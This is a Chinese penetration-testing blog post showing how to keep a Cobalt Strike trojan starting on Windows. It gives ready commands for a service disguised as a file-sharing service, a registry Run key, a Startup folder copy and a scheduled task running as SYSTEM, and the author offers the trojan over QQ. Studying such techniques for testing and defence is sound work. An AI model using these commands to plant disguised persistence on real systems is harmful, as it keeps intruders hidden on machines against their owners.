您现在的位置是:网站首页> 网络安全 渗透测试

cobalt strike后门windows下开机自启动

栗子2019-07-24 18:22:40渗透测试人已围观

简介后门利用持久化是内外渗透一项基本功,平常程序主要通过系统服务、注册表、开始菜单启动等三种方式实现程序自启,后门也是如此。

首先使用cobalt strike生成木马程序,这里就不再介绍了,如果哪位大师傅需要请直接联系我qq即可。

这里可以看到已经有一台受控端上线。

系统服务自启

直接控制台执行以下命令即可,或者直接新建个bat文件-上传-执行也可以

sc create "Share" binpath= "C:\Users\xiaom\Desktop\test.exe"
sc description "Share" "Windwos文件共享服务"
sc config "Share" start= auto
net start "Share"

默认情况下,会提示拒绝访问,意思是权限不够。

shell 1.bat

可以看到已经上线,但是几秒后就关闭了。因为直接使用cs生成的exe木马无法通过服务自启动,会报错:服务没有及时响应启动或控制请求。

可以使用我之前写的免杀马,可以通过以上方式实现自启,并且还是system权限。


注册表自启

利用 控制台reg命令新增一个名为“后门”的自启项,权限是管理员,但不是system。

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "后门" /t REG_SZ /d "C:\Users\xiaom\Desktop\test.exe" /f

开始菜单自启

利用copy将后门复制到开始菜单中的“启动”里面也可以实现自启。比较简单就不配图了。权限是管理员,但不是system

copy C:\users\xiaom\desktop\test.exe "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\"

任务计划自启

任务计划自启是最近恶意软件经常使用的手段,使用简单更隐蔽。

通过下面命令,可以实现开机自启,且为system权限~,非常强大。

schtasks /create /tn "后门" /tr C:\users\xiaom\desktop\test.exe /sc onstart /NP /ru "System" 
start %systemroot% \tasks

若要删除任务

schtasks /delete /tn "后门" /F


很赞哦!()

栗子

栗子(共18篇文章)

去见你想见的人,去做你想做的事,趁阳光正好,趁微风不燥,趁你还未老。